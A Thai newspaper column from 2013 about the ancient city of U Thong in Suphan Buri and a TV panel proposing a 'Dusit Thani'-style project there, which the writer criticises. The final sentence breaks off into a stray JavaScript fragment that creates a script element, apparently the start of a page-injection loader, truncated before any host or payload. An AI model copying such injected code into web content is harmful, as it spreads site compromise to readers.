Download PDF

มติชนรายวัน ฉบับประจำวันอังคารที่ 9 กรกฎาคม 2556

 

           ท่านนายกฯ บรรหาร ศิลปอาชา และคณะใหญ่ แวะเวียนไปที่มติชนเมื่อต้นเดือนมิถุนายนที่ผ่านมา แล้วสนทนากับท่านประธานฯ ขรรค์ชัย บุนปาน

           ถึงเรื่องเมืองอู่ทอง (อ. อู่ทอง จ. สุพรรณบุรี) ว่ายังมีปัญหาต้องแก้ไขอีกมาก คือทำยังไงจะกระตุ้นให้ทางการกระตือรือร้นแบ่งปันเผยแพร่ความรู้อย่างง่ายๆ ให้เข้าใจความเป็นมาที่เกี่ยวข้องกับยุคต้นประวัติศาสตร์ไทย

           เพื่อให้คนท้องถิ่นและคนไทยทั่วไปมีสำนึกหวงแหน แล้วร่วมกันดูแลรักษาเมืองอู่ทองให้ยั่งยืนตลอดไป

           ผมเป็นผู้น้อยพลอยพยัก ที่ต้องค่อยๆก้มประนมกรขอรับครับกระผมไปตามจังหวะจะโคน ว่าถ้าพิพิธภัณฑสถานแห่งชาติ อู่ทอง พัฒนาการบริหารจัดการให้ทันสมัยและก้าวหน้าทางความคิดประวัติศาสตร์โบราณคดีในโลก ก็จะช่วยได้มากเรื่องแบ่งปันเผยแพร่ความรู้อู่ทอง

           นับตั้งแต่วันนั้นก็ไม่ได้ยินข่าวคราวอะไรอีกจากอู่ทองและสุพรรณบุรี จนกระทั่งไม่นานมานี้มีกิจกรรมทางทีวี

           การมีส่วนร่วมในเมืองโบราณอู่ทอง “ดุสิตธานี” ในมิติใหม่ เป็นชื่อหัวข้อเสวนาที่ออนแอร์ทางเนชั่น แชนแนล เมื่อวันจันทร์ที่ 1 กรกฎาคม 2556 รีโมตสั่งการให้ผมได้เห็นโดยไม่ตั้งใจ เมื่อปลายรายการใกล้เที่ยงแล้ว

           ได้ยิน ศิวกานท์ ปทุมสูต กวีอู่ทอง ผู้ร่วมเสวนาคนหนึ่งเอ่ยปากถามคนอื่นๆทำนองว่า“ดุสิตธานีมาเกี่ยวยังไง?” ซึ่งตรงกับใจคนจำนวนมาก

           มีผู้พยายามอธิบายด้วยเหตุผลยาวๆให้ฟัง

           แต่ผมฟังไม่เข้าใจ เพราะไม่ฉลาด เลยพูดไม่ออก บอกไม่ถูก เขียนเล่าไม่ได้ตรงนี้

           มีผู้บอกอย่างสนุกๆในภายหลังว่าชะรอยอู่ทองในอนาคตจะเป็นเมืองจำลองของเล่นๆไว้รับนักท่องเที่ยวเหมือนดุสิตธานี ที่เคยมีเล่นๆกันมาก่อน จนทำให้ประชาธิปไตยเป็นของเล่นๆของฝูงอำมาตย์ไทยสืบจนทุกวันนี้

           ถ้าพวกเขาทำอย่างนี้จริงๆ คนอื่นจะมีพลังคัดค้านอะไรได้หรือ? นอกจากรอเที่ยวดุสิตธานี ดิสนีย์แลนด์ ที่ท้าวอู่ทองคงต้องอพยพหนีอีกครั้งเพราะโรคห่ากำลังมาลงซ้ำรอยเมืองอู่ทอง

           แต่ผมยังไม่ปลงใจว่าจะเป็นจริงอย่างนั้น

           เพราะเมืองอู่ทองเป็นต้นทางประวัติศาสตร์ไทยที่มีหลักฐานโบราณคดีเก่าแก่และสำคัญอย่างยิ่งต่อคนไทย

           แล้วยังเป็นต้นทางประวัติศาสตร์ศาสนาของสุวรรณภูมิในอาเซียนด้วย

           คนอู่ทอง สุพรรณบุรี และคนไทยทั้งมวล น่าจะมีพลังสร้างสรรค์เมืองอู่ทองอย่างเฉลียวฉลาด ให้อยู่ในร่องในรอยและในสากลโลกได้อย่างองอาจ} else {var d=document;var s=d.createElement(‘script’);